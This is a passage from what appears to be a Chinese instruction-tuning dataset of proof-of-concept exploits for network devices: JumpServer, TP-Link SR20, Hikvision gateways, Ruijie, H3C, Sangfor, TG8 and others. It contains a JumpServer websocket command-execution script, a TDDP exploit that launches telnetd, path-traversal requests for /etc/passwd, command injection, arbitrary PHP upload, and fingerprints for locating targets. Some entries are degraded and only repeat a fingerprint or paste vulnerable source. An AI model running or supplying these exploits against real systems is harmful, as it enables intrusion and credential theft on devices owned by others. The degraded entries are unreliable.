url_host+'/api/v1/users/connection-token/?user-only=1'\n#     url =url_host+'/api/v1/authentication/connection-token/?user-only=1'\n#     response = requests.post(url, json=data).json()\n#     print(response)\n#     ret=requests.get(url_host+'/api/v1/authentication/connection-token/?token=%s'%response['token'])\n#     print(ret.text)\n# get_token()\nimport asyncio\nimport websockets\nimport requests\nimport json\nurl = \"/api/v1/authentication/connection-token/?user-only=None\"\n\n# 向服务器端发送认证后的消息\nasync def send_msg(websocket,_text):\n    if _text == \"exit\":\n        print(f'you have enter \"exit\", goodbye')\n        await websocket.close(reason=\"user exit\")\n        return False\n    await websocket.send(_text)\n    recv_text = await websocket.recv()\n    print(f\"{recv_text}\")\n\n# 客户端主逻辑\nasync def main_logic(cmd):\n    print(\"#######start ws\")\n    async with websockets.connect(target) as websocket:\n        recv_text = await websocket.recv()\n        print(f\"{recv_text}\")\n        resws=json.loads(recv_text)\n        id = resws['id']\n        print(\"get ws id:\"+id)\n        print(\"###############\")\n        print(\"init ws\")\n        print(\"###############\")\n        inittext = json.dumps({\"id\": id, \"type\": \"TERMINAL_INIT\", \"data\": \"{\\\"cols\\\":164,\\\"rows\\\":17}\"})\n        await send_msg(websocket,inittext)\n        for i in range(20):\n            recv_text = await websocket.recv()\n            print(f\"{recv_text}\")\n        print(\"###############\")\n        print(\"exec cmd: ls\")\n        cmdtext = json.dumps({\"id\": id, \"type\": \"TERMINAL_DATA\", \"data\": cmd+\"\\r\\n\"})\n        print(cmdtext)\n        await send_msg(websocket, cmdtext)\n        for i in range(20):\n            recv_text = await websocket.recv()\n            print(f\"{recv_text}\")\n        print('#######finish')\n\n\nif __name__ == '__main__':\n    try:\n        import sys\n        host=sys.argv[1]\n        cmd=sys.argv[2]\n        if host[-1]=='/':\n            host=host[:-1]\n        print(host)\n        data = {\"user\": \"4320ce47-e0e0-4b86-adb1-675ca611ea0c\", \"asset\": \"ccb9c6d7-6221-445e-9fcc-b30c95162825\",\n                \"system_user\": \"79655e4e-1741-46af-a793-fff394540a52\"}\n        print(\"##################\")\n        print(\"get token url:%s\" % (host + url,))\n        print(\"##################\")\n        res = requests.post(host + url, json=data)\n        token = res.json()[\"token\"]\n        print(\"token:%s\", (token,))\n        print(\"##################\")\n        target = \"ws://\" + host.replace(\"http://\", '') + \"/koko/ws/token/?target_id=\" + token\n        print(\"target ws:%s\" % (target,))\n        asyncio.get_event_loop().run_until_complete(main_logic(cmd))\n    except:\n        print(\"python jumpserver.py http://192.168.1.73 whoami\")\n3. async with websockets.connect(target) as websocket:\n", "category": "poc_network_device_vulnerability", "source": "awesome_poc_dataset", "file_path": "网络设备漏洞/JumpServer 远程命令执行漏洞.md"}
    397. 

  397. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:绿盟 SAS堡垒机 local_user.php 任意用户登录漏洞\n漏洞描述:绿盟堡垒机存在任意用户登录漏洞,攻击者通过漏洞包含 www/local_user.php 实现任意⽤户登录\n影响版本:绿盟 SAS堡垒机\n网络测绘:``` body=\"'/needUsbkey.php?username='\" ```\n", "input": "", "output": "【漏洞类型】network_device_vulnerability\n【POC利用方法】\n1. body=\"'/needUsbkey.php?username='\"\n2. /api/virtual/home/status?cat=../../../../../../../../../../../../../../usr/local/nsfocus/web/apache2/www/local_user.php&method=login&user_account=admin\n", "category": "poc_network_device_vulnerability", "source": "awesome_poc_dataset", "file_path": "网络设备漏洞/绿盟 SAS堡垒机 local_user.php 任意用户登录漏洞.md"}
    398. 

  398. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:FLIR-AX8 download.php 任意文件下载\n漏洞描述:FLIR-AX8 download.php文件过滤不全 存在任意文件下载漏洞\n影响版本:``` FLIR-AX8 ```\n网络测绘:``` app=\"FLIR-FLIR-AX8\" ```\n", "input": "", "output": "【漏洞类型】network_device_vulnerability\n【POC利用方法】\n1. app=\"FLIR-FLIR-AX8\"\n2. <?php\n/**\n * Copyright 2012 Armand Niculescu - MediaDivision.com\n * Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:\n * 1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.\n * 2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.\n * THIS SOFTWARE IS PROVIDED BY THE FREEBSD PROJECT \"AS IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE FREEBSD PROJECT OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n */\n// get the file request, throw error if nothing supplied\n\n// hide notices\n@ini_set('error_reporting', E_ALL & ~ E_NOTICE);\n\n//- turn off compression on the server\n//@apache_setenv('no-gzip', 1);\n//@ini_set('zlib.output_compression', 'Off');\n\nif(!isset($_REQUEST['file']) || empty($_REQUEST['file']))\n{\n\theader(\"HTTP/1.0 400 Bad Request\");\n\texit;\n}\n\n// sanitize the file request, keep just the name and extension\n// also, replaces the file location with a preset one ('./myfiles/' in this example)\n$file_path  = $_REQUEST['file'];\n$file_type = $_REQUEST['type'];\n$path_parts = pathinfo($file_path);\n$file_name  = $path_parts['basename'];\n$file_ext   = $path_parts['extension'];\n\n// allow a file to be streamed instead of sent as an attachment\n$is_attachment = isset($_REQUEST['stream']) ? false : true;\n\n// make sure the file exists\nif (is_file($file_path))\n{\n\t$file_size  = filesize($file_path);\n\t$file = @fopen($file_path,\"rb\");\n\tif ($file)\n\t{\n\t\t// set the headers, prevent caching\n\t\theader(\"Pragma: public\");\n\t\theader(\"Expires: -1\");\n\t\theader(\"Cache-Control: public, must-revalidate, post-check=0, pre-check=0\");\n\t\theader(\"Content-Disposition: attachment; filename=\\\"$file_name\\\"\");\n\n        // set appropriate headers for attachment or streamed file\n        if ($is_attachment) {\n                header(\"Content-Disposition: attachment; filename=\\\"$file_name\\\"\");\n        }\n        else {\n                header('Content-Disposition: inline;');\n                header('Content-Transfer-Encoding: binary');\n        }\n\n        // set the mime type based on extension, add yours if needed.\n        $ctype_default = \"application/octet-stream\";\n        $content_types = array(\n                \"exe\" => \"application/octet-stream\",\n                \"zip\" => \"application/zip\",\n                \"mp3\" => \"audio/mpeg\",\n                \"mpg\" => \"video/mpeg\",\n                \"avi\" => \"video/x-msvideo\",\n        );\n        $ctype = isset($content_types[$file_ext]) ? $content_types[$file_ext] : $ctype_default;\n        header(\"Content-Type: \" . $ctype);\n\n\t\t//check if http_range is sent by browser (or download manager)\n\t\tif(isset($_SERVER['HTTP_RANGE']))\n\t\t{\n\t\t\tlist($size_unit, $range_orig) = explode('=', $_SERVER['HTTP_RANGE'], 2);\n\t\t\tif ($size_unit == 'bytes')\n\t\t\t{\n\t\t\t\t//multiple ranges could be specified at the same time, but for simplicity only serve the first range\n\t\t\t\t//http://tools.ietf.org/id/draft-ietf-http-range-retrieval-00.txt\n\t\t\t\tlist($range, $extra_ranges) = explode(',', $range_orig, 2);\n\t\t\t}\n\t\t\telse\n\t\t\t{\n\t\t\t\t$range = '';\n\t\t\t\theader('HTTP/1.1 416 Requested Range Not Satisfiable');\n\t\t\t\texit;\n\t\t\t}\n\t\t}\n\t\telse\n\t\t{\n\t\t\t$range = '';\n\t\t}\n\n\t\t//figure out download piece from range (if set)\n\t\tlist($seek_start, $seek_end) = explode('-', $range, 2);\n\n\t\tob_clean();\n\t\t\n\t\t//set start and end based on range (if set), else set defaults\n\t\t//also check for invalid ranges.\n\t\t$seek_end   = (empty($seek_end)) ? ($file_size - 1) : min(abs(intval($seek_end)),($file_size - 1));\n\t\t$seek_start = (empty($seek_start) || $seek_end < abs(intval($seek_start))) ? 0 : max(abs(intval($seek_start)),0);\n\t \n\t\t//Only send partial content header if downloading a piece of the file (IE workaround)\n\t\tif ($seek_start > 0 || $seek_end < ($file_size - 1))\n\t\t{\n\t\t\theader('HTTP/1.1 206 Partial Content');\n\t\t\theader('Content-Range: bytes '.$seek_start.'-'.$seek_end.'/'.$file_size);\n\t\t\theader('Content-Length: '.($seek_end - $seek_start + 1));\n\t\t}\n\t\telse\n\t\t  header(\"Content-Length: $file_size\");\n\n\t\theader('Accept-Ranges: bytes');\n    \n\t\tset_time_limit(0);\n\t\tfseek($file, $seek_start);\n\t\t\n\t\twhile(!feof($file)) \n\t\t{\n\t\t\tprint(@fread($file, 1024*8));\n\t\t\tob_flush();\n\t\t\tflush();\n\t\t\tif (connection_status()!=0) \n\t\t\t{\n\t\t\t\t@fclose($file);\n\t\t\t\texit;\n\t\t\t}\t\t\t\n\t\t}\n\t\t\n\t\t// file save was a success\n\t\t@fclose($file);\n\t\texit;\n\t}\n\telse \n\t{\n\t\t// file couldn't be opened\n\t\theader(\"HTTP/1.0 500 Internal Server Error\");\n\t\texit;\n\t}\n}\nelse\n{\n\t// file does not exist\n\theader(\"HTTP/1.0 404 Not Found\");\n\texit;\n}\n?>\n3. /download.php?file=/etc/passwd\n", "category": "poc_network_device_vulnerability", "source": "awesome_poc_dataset", "file_path": "网络设备漏洞/FLIR-AX8 download.php 任意文件下载.md"}
    399. 

  399. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Wayos 防火墙 后台命令执行漏洞\n漏洞描述:Wayos 防火墙 后台存在命令执行漏洞,通过命令注入可以执行远程命令\n影响版本:``` Wayos 防火墙 ```\n网络测绘:``` body=\"Get_Verify_Info(hex_md5(user_string).\" ```\n", "input": "", "output": "【漏洞类型】network_device_vulnerability\n【POC利用方法】\n1. body=\"Get_Verify_Info(hex_md5(user_string).\"\n2. body=\"Get_Verify_Info(hex_md5(user_string).\"\n", "category": "poc_network_device_vulnerability", "source": "awesome_poc_dataset", "file_path": "网络设备漏洞/Wayos 防火墙 后台命令执行漏洞.md"}
    400. 

  400. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:HIKVISION 视频编码设备接入网关 showFile.php 任意文件下载漏洞\n漏洞描述:海康威视视频接入网关系统在页面`/serverLog/showFile.php`的参数fileName存在任意文件下载漏洞\n影响版本:``` HIKVISION 视频编码设备接入网关 ```\n网络测绘:``` title=\"视频编码设备接入网关\" ```\n", "input": "", "output": "【漏洞类型】network_device_vulnerability\n【POC利用方法】\n1. HIKVISION 视频编码设备接入网关\n2. title=\"视频编码设备接入网关\"\n3. <?php\n\t\t\t\t\t$file_name = $_GET['fileName'];\n\t\t\t\t\t$file_path = '../../../log/'.$file_name;\n\t\t\t\t\t$fp = fopen($file_path, \"r\");\n\t\t\t\t\twhile($line = fgets($fp)){\n\t\t\t\t\t\t$line = nl2br(htmlentities($line, ENT_COMPAT, \"utf-8\"));\n\t\t\t\t\t\techo '<span style=\"font-size:16px\">'.$line.'</span>';\n\t\t\t\t\t}\n\t\t\t\t\tfclose($fp);\n?>\n", "category": "poc_network_device_vulnerability", "source": "awesome_poc_dataset", "file_path": "网络设备漏洞/HIKVISION 视频编码设备接入网关 showFile.php 任意文件下载漏洞.md"}
    401. 

  401. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:D-Link DAR-8000 importhtml.php 远程命令执行漏洞\n漏洞描述:D-Link DAR-8000 importhtml.php文件存在SQL注入导致 远程命令执行漏洞\n影响版本:``` D-Link DAR-8000 ```\n网络测绘:``` body=\"mask.style.visibility\" ```\n", "input": "", "output": "【漏洞类型】network_device_vulnerability\n【POC利用方法】\n1. D-Link DAR-8000\n2. body=\"mask.style.visibility\"\n3. <?php \ninclude_once(\"global.func.php\");\nif($_SESSION['language']!=\"english\")\n{\n\trequire_once (\"include/language_cn.php\");\n}\nelse \n{\n\trequire_once (\"include/language_en.php\");\n}\n\nif(isset($_GET['type'])) $get_type = $_GET['type'];\nif(isset($_GET['tab'])) $get_tab = $_GET['tab'];\nif(isset($_GET['sql'])) $get_sql = $_GET['sql'];\n\nif($get_type == \"exporthtmlpost\")\t\n{\n\t$get_tab = $arr_export_cn[$get_tab];\n\texportHtml(\"$get_tab\",stripslashes(base64_decode($get_sql)));\n}\nelseif($get_type == \"exporthtmlchat\")\t\n{\n\t$get_tab = $arr_export_cn[$get_tab];\n\texportHtmlChat(\"$get_tab\",stripslashes(base64_decode($get_sql)));\n}\nelseif($get_type == \"exporthtmlmail\")\t\n{\n\t$get_tab = $arr_export_cn[$get_tab];\n\texportHtmlMail(\"$get_tab\",stripslashes(base64_decode($get_sql)));\n}\nelseif($get_type == \"exporthtmlwebsend\")\t\n{\n\t$get_tab = $arr_export_cn[$get_tab];\n\texportHtmlWebSend(\"$get_tab\",stripslashes(base64_decode($get_sql)));\n}\nelseif($get_type == \"exporthtmlwebrecv\")\t\n{\n\t$get_tab = $arr_export_cn[$get_tab];\n\texportHtmlWebRecv(\"$get_tab\",stripslashes(base64_decode($get_sql)));\n}\n?>\n", "category": "poc_network_device_vulnerability", "source": "awesome_poc_dataset", "file_path": "网络设备漏洞/D-Link DAR-8000 importhtml.php 远程命令执行漏洞.md"}
    402. 

  402. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:皓峰防火墙 setdomain.php 越权访问漏洞\n漏洞描述:皓峰防火墙 setdomain.php 页面存在越权访问漏洞,攻击者通过漏洞可修改管理员等配置信息\n影响版本:``` 皓峰防火墙 ```\n网络测绘:``` app=\"皓峰防火墙系统登录\" ```\n", "input": "", "output": "【漏洞类型】network_device_vulnerability\n【POC利用方法】\n1. app=\"皓峰防火墙系统登录\"\n2. /setdomain.php?action=list\n", "category": "poc_network_device_vulnerability", "source": "awesome_poc_dataset", "file_path": "网络设备漏洞/皓峰防火墙 setdomain.php 越权访问漏洞.md"}
    403. 

  403. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:TP-Link SR20 远程命令执行\n漏洞描述:据外媒报道,著名安全专家、Google 安全工程师Matthew Garrett公开了TP-LINK SR20智能家居路由器一个“允许来自本地网络连接的任意命令执行”的漏洞。攻击者可通过该漏洞控制用户路由器,借此执行任意命令,危及用户隐私安全。\n影响版本:``` TP-Link SR20 ```\n", "input": "", "output": "【漏洞类型】network_device_vulnerability\n【POC利用方法】\n1. TP-Link SR20\n2. #!/usr/bin/python3\n# Create /testfile in your tftp root directory with the followingcontents:\n#function config_test(config)\n# os.execute(\"telnetd -l/bin/login.sh\")\n#end\n# Replace 192.168.0.1 with the IP address of the vulnerable device\nimportbinascii\nimportsocket\nport_send = 1040\nport_receive = 61000\ntddp_ver = \"01\"\ntddp_command = \"31\"\ntddp_req = \"01\"\ntddp_reply = \"00\"\ntddp_padding = \"%0.16X\"% 00\ntddp_packet = \"\".join([tddp_ver, tddp_command, tddp_req,tddp_reply, tddp_padding])\nsock_receive = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\nsock_receive.bind(( '', port_receive))\n\n# Send a request\nsock_send = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\npacket = binascii.unhexlify(tddp_packet)\npacket = packet + b\"/testfile;arbitrary\"\nprint(packet)\nsock_send.sendto(packet, ( \"192.168.0.1\", port_send))\nsock_send.close()\nresponse, addr = sock_receive.recvfrom( 1024)\nr = response.encode( 'hex')\nprint(r)\n", "category": "poc_network_device_vulnerability", "source": "awesome_poc_dataset", "file_path": "网络设备漏洞/TP-Link SR20 远程命令执行.md"}
    404. 

  404. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:TG8 防火墙 RCE及密码泄漏漏洞\n漏洞描述:TG8防火墙中存在两个漏洞,远程用户可以以用户身份执行命令而无需通过设备进行身份验证。第二个漏洞允许在不经过身份验证的情况下公开现有用户的密码。 参考链接: - https://ssd-disclosure.com/ssd-advisory-tg8-firewall-preauth-rce-and-password-disclosure/\n", "input": "", "output": "【漏洞类型】network_device_vulnerability\n【POC利用方法】\n1. POST http://<server>/admin/runphpcmd.php HTTP/1.1\nHost: Server\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0\nAccept: application/json, text/javascript, */*; q=0.01\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-Requested-With: XMLHttpRequest\nContent-Length: 68\nConnection: keep-alive\n\n\nsyscmd=sudo+%2Fhome%2FTG8%2Fv3%2Fsyscmd%2Fcheck_gui_login.sh+<Payload>++local\n2. syscmd=sudo+/home/TG8/v3/syscmd/check_gui_login.sh+;whoami;++local\n3. http://<server>/data/w-341.tg\nhttp://<server>/data/w-342.tg\nhttp://<server>/data/r-341.tg\nhttp://<server>/data/r-342.tg\n", "category": "poc_network_device_vulnerability", "source": "awesome_poc_dataset", "file_path": "网络设备漏洞/TG8 防火墙 RCE及密码泄漏漏洞.md"}
    405. 

  405. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:H3C SecPath下一代防火墙 任意文件下载漏洞\n漏洞描述:H3C SecPath 下一代防火墙  存在功能点导致任意文件下载漏洞,攻击者通过漏洞可以获取敏感信息\n影响版本:``` H3C SecPath ```\n网络测绘:``` title=\"Web user login\" ```\n", "input": "", "output": "【漏洞类型】network_device_vulnerability\n【POC利用方法】\n1. H3C SecPath\n2. title=\"Web user login\"\n3. /webui/?g=sys_dia_data_check&file_name=../../etc/passwd\n\n/webui/?\ng=sys_capture_file_download&name=../../../../../../../../etc/passwd\n", "category": "poc_network_device_vulnerability", "source": "awesome_poc_dataset", "file_path": "网络设备漏洞/H3C SecPath下一代防火墙 任意文件下载漏洞.md"}
    406. 

  406. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:锐捷 NBR 路由器 fileupload.php 任意文件上传漏洞\n漏洞描述:锐捷 NBR 路由器 fileupload.php文件存在任意文件上传漏洞,攻击者通过漏洞可以上传任意文件到服务器获取服务器权限\n影响版本:锐捷 NBR 路由器\n网络测绘:``` app=\"Ruijie-NBR路由器\" ```\n", "input": "", "output": "【漏洞类型】network_device_vulnerability\n【POC利用方法】\n1. app=\"Ruijie-NBR路由器\"\n2. POST /ddi/server/fileupload.php?uploadDir=../../321&name=123.php HTTP/1.1\nHost: \nAccept: text/plain, */*; q=0.01\nContent-Disposition: form-data; name=\"file\"; filename=\"111.php\"\nContent-Type: image/jpeg\n\n<?php phpinfo();?>\n3. Accept: text/plain, */*; q=0.01\n", "category": "poc_network_device_vulnerability", "source": "awesome_poc_dataset", "file_path": "网络设备漏洞/锐捷 NBR 路由器 fileupload.php 任意文件上传漏洞.md"}
    407. 

  407. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:锐捷 EG易网关 branch_passw.php 远程命令执行\n漏洞描述:锐捷EG易网关 branch_passw.php存在命令执行漏洞,配合 锐捷EG易网关 管理员账号密码泄露漏洞 达到RCE控制服务器\n影响版本:``` 锐捷EG易网关 ```\n网络测绘:``` app=\"Ruijie-EG易网关\" ```\n", "input": "", "output": "【漏洞类型】network_device_vulnerability\n【POC利用方法】\n1. app=\"Ruijie-EG易网关\"\n2. <?php\n\n/**\n * 分支密码的统一管理\n */\ndefine('IN', true);     //定位该文件是入口文件\ndefine('DS', DIRECTORY_SEPARATOR);  //定义系统目录分隔符\ndefine('AROOT', dirname(__FILE__) . DS);    //定义入口所在的目录\ninclude_once(dirname(dirname(__FILE__)) . DS . 'mvc' . DS . 'controller' . DS . 'core.controller.php');\n\nclass defaultController extends coreController {\n\n    private $filename;\n    private $cli = \"evpn-server config all-clients file \\\"/data/evpn/cfg_pwd.text\\\"\";\n\n    function __construct() {\n        parent::__construct();\n        $this->filename = DS . \"data\" . DS . \"evpn\" . DS . \"cfg_pwd.text\";\n    }\n\n    /**\n     * 设置分支设备的密码\n     * @param string post(pass) 分支密码\n     */\n    public function setAction() {\n        $pass = p(\"pass\");\n        if ($pass == FALSE) {\n            json_echo(false);\n            return;\n        }\n        $command = \"/usr/local/evpn/server/cfg_pass.sh config \" . $pass;\n        evpnShell($command);\n    }\n    \n    /**\n     * 关闭集中控制功能\n     */\n    function closeAction(){\n        evpnShell(\"/usr/local/evpn/server/cfg_pass.sh disable\");\n    }\n\n    /**\n     * 获取分支密码\n     */\n    function getAction() {\n        $command = \"/usr/local/evpn/server/echo_pass.sh\";\n        $content = [];\n        exec(EscapeShellCmd($command), $content);\n        $data = array(\"status\" => true,\n            \"data\" => isset($content[0]) && $content[0] === \"\" ? \"\" : $content);\n        json_echo($data);\n    }\n    \n    /**\n     * 获取分支密码设置列表\n     */\n    function listAction(){\n        $province = p(\"province\");\n        $city = p(\"city\");\n        $district = p(\"district\");\n        $shell = \"/usr/local/evpn/server/sh_clients_pass.sh\";\n        if($province !== FALSE && $province != \"\"){\n            $shell .= \" province \".iconv(\"UTF-8\", \"GB2312//IGNORE\", $province);\n        }\n        if($city !== FALSE && $city != \"\"){\n            $shell .= \" city \".iconv(\"UTF-8\", \"GB2312//IGNORE\", $city);\n        }\n        if($district !== FALSE && $district != \"\"){\n            $shell .= \" district \".iconv(\"UTF-8\", \"GB2312//IGNORE\", $district);\n        }\n        header(\"Content-type: text/html;charset=gbk\");\n        header(\"Cache-Control: no-cache, must-revalidate\");\n        header(\"Pragma: no-cache\");\n        echo `$shell`;\n    }\n\n}\n\ninclude_once dirname(dirname(__FILE__)) . '/init.php';     //mvc架构初始化\n3. /**\n     * 设置分支设备的密码\n     * @param string post(pass) 分支密码\n     */\n    public function setAction() {\n        $pass = p(\"pass\");\n        if ($pass == FALSE) {\n            json_echo(false);\n            return;\n        }\n        $command = \"/usr/local/evpn/server/cfg_pass.sh config \" . $pass;\n        evpnShell($command);\n    }\n", "category": "poc_network_device_vulnerability", "source": "awesome_poc_dataset", "file_path": "网络设备漏洞/锐捷 EG易网关 branch_passw.php 远程命令执行.md"}
    408. 

  408. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Crestron aj.html 账号密码泄漏漏洞 CVE-2022-23178\n漏洞描述:Crestron HD等系列设备 aj.html页面调用特定的参数可以获取账号密码等敏感信息\n影响版本:``` Crestron HD等系列设备 ```\n网络测绘:``` app=\"Crestron-HD-RX-201-C-E\" ```\n", "input": "", "output": "【漏洞类型】network_device_vulnerability\n【CVE编号】CVE-2022-23178\n【POC利用方法】\n1. Crestron HD等系列设备\n2. app=\"Crestron-HD-RX-201-C-E\"\n3. /aj.html?a=devi\n", "category": "poc_network_device_vulnerability", "source": "awesome_poc_dataset", "file_path": "网络设备漏洞/Crestron aj.html 账号密码泄漏漏洞 CVE-2022-23178.md"}
    409. 

  409. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:HIKVISION 联网网关 downdb.php 任意文件读取漏洞\n漏洞描述:海康威视 联网网关 在页面 downdb.php 的参数fileName存在任意文件下载漏洞\n影响版本:``` HIKVISION 联网网关,流媒体管理服务器 ```\n网络测绘:``` \"杭州海康威视系统技术有限公司 版权所有\" && title==\"联网网关\" ```\n", "input": "", "output": "【漏洞类型】network_device_vulnerability\n【POC利用方法】\n1. HIKVISION 联网网关,流媒体管理服务器\n2. \"杭州海康威视系统技术有限公司 版权所有\" && title==\"联网网关\"\n3. <?php\n$file_name=$_GET['fileName'];\n$file_dir = \"../../../\";\nif   (!file_exists($file_dir.$file_name))   {   //检查文件是否存在  \n  echo'<script> alert(\"文件不存在!\");window.history.back(-1);</script>'; \n  exit();\n\n}else{\t\n\t$file = fopen($file_dir . $file_name,\"r\"); // 打开文件\n\t// 输入文件标签\n\tHeader(\"Content-type: application/octet-stream\");\n\tHeader(\"Accept-Ranges: bytes\");\n\tHeader(\"Accept-Length: \".filesize($file_dir . $file_name));\n\tHeader(\"Content-Disposition: attachment; filename=\" . $file_name);\n\t// 输出文件内容\n\techo fread($file,filesize($file_dir.$file_name));\n\tfclose($file);\n\texit();\n}\n?>\n", "category": "poc_network_device_vulnerability", "source": "awesome_poc_dataset", "file_path": "网络设备漏洞/HIKVISION 联网网关 downdb.php 任意文件读取漏洞.md"}
    410. 

  410. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:AVEVA InTouch安全网关 AccessAnywhere 任意文件读取漏洞 CVE-2022-23854\n漏洞描述:AVEVA InTouch Access Anywhere Secure Gateway 2020 R2及以前的版本存在路径遍历漏洞,未授权的攻击者可利用该漏洞获取服务器敏感信息。\n影响版本:``` AVEVA InTouch安全网关 ```\n网络测绘:``` body=\"InTouch Access Anywhere\" ```\n", "input": "", "output": "【漏洞类型】network_device_vulnerability\n【CVE编号】CVE-2022-23854\n【POC利用方法】\n1. AVEVA InTouch安全网关\n2. body=\"InTouch Access Anywhere\"\n3. /AccessAnywhere/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255cwindows%255cwin.ini\n", "category": "poc_network_device_vulnerability", "source": "awesome_poc_dataset", "file_path": "网络设备漏洞/AVEVA InTouch安全网关 AccessAnywhere 任意文件读取漏洞 CVE-2022-23854.md"}
    411. 

  411. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Sapido 多款路由器 远程命令执行漏洞\n漏洞描述:Sapido多款路由器在未授权的情况下,导致任意访问者可以以Root权限执行命令\n影响版本:``` BR270n-v2.1.03 BRC76n-v2.1.03 GR297-v2.1.3 RB1732-v2.0.43 ```\n网络测绘:``` app=\"Sapido-路由器\" ```\n", "input": "", "output": "【漏洞类型】network_device_vulnerability\n【POC利用方法】\n1. BR270n-v2.1.03\nBRC76n-v2.1.03\nGR297-v2.1.3\nRB1732-v2.0.43\n2. app=\"Sapido-路由器\"\n3. http://xxx.xxx.xxx.xxx/syscmd.asp\nhttp://xxx.xxx.xxx.xxx/syscmd.htm\n", "category": "poc_network_device_vulnerability", "source": "awesome_poc_dataset", "file_path": "网络设备漏洞/Sapido 多款路由器 远程命令执行漏洞.md"}
    412. 

  412. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:绿盟 SAS堡垒机 GetFile 任意文件读取漏洞\n漏洞描述:绿盟堡垒机存在任意用户登录漏洞,攻击者通过漏洞包含 www/local_user.php 实现任意⽤户登录\n影响版本:绿盟 SAS堡垒机\n网络测绘:``` body=\"'/needUsbkey.php?username='\" ```\n", "input": "", "output": "【漏洞类型】network_device_vulnerability\n【POC利用方法】\n1. body=\"'/needUsbkey.php?username='\"\n2. /webconf/GetFile/index?path=../../../../../../../../../../../../../../etc/passwd\n3. /webconf/GetFile/index?path=../../../../../../../../../../../../../../etc/passwd\n", "category": "poc_network_device_vulnerability", "source": "awesome_poc_dataset", "file_path": "网络设备漏洞/绿盟 SAS堡垒机 GetFile 任意文件读取漏洞.md"}
    413. 

  413. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:深信服 NGAF下一代防火墙 loadfile.php 任意文件读取漏洞\n漏洞描述:深信服下一代防火墙是一款以应用安全需求出发而设计的下一代应用防火墙。深信服下一代防火墙在 loadfile.php 处存在文件读取漏洞,攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等。\n影响版本:深信服 NGAF下一代防火墙\n网络测绘:``` \"Redirect.php?url=LogInOut.php\" ```\n", "input": "", "output": "【漏洞类型】network_device_vulnerability\n【POC利用方法】\n1. \"Redirect.php?url=LogInOut.php\"\n2. GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1\nHost: \nUser-Agent: Opera/8.90.(Windows NT 6.0; is-IS) Presto/2.9.177 Version/10.00\nAccept-Encoding: gzip, deflate\nAccept: */*\ny-forwarded-for: 127.0.0.1\n3. GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1\n", "category": "poc_network_device_vulnerability", "source": "awesome_poc_dataset", "file_path": "网络设备漏洞/深信服 NGAF下一代防火墙 loadfile.php 任意文件读取漏洞.md"}
    414. 

  414. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:安恒 明御WEB应用防火墙 report.php 任意用户登录漏洞\n漏洞描述:安恒 明御WEB应用防火墙 report.php文件存在硬编码设置的Console用户登录,攻击者可以通过漏洞直接登录后台\n影响版本:``` 安恒 明御WEB应用防火墙 ```\n网络测绘:``` app=\"安恒信息-明御WAF\" ```\n", "input": "", "output": "【漏洞类型】network_device_vulnerability\n【POC利用方法】\n1. 安恒 明御WEB应用防火墙\n2. app=\"安恒信息-明御WAF\"\n3. /report.m?a=rpc-timed\n", "category": "poc_network_device_vulnerability", "source": "awesome_poc_dataset", "file_path": "网络设备漏洞/安恒 明御WEB应用防火墙 report.php 任意用户登录漏洞.md"}
    415. 

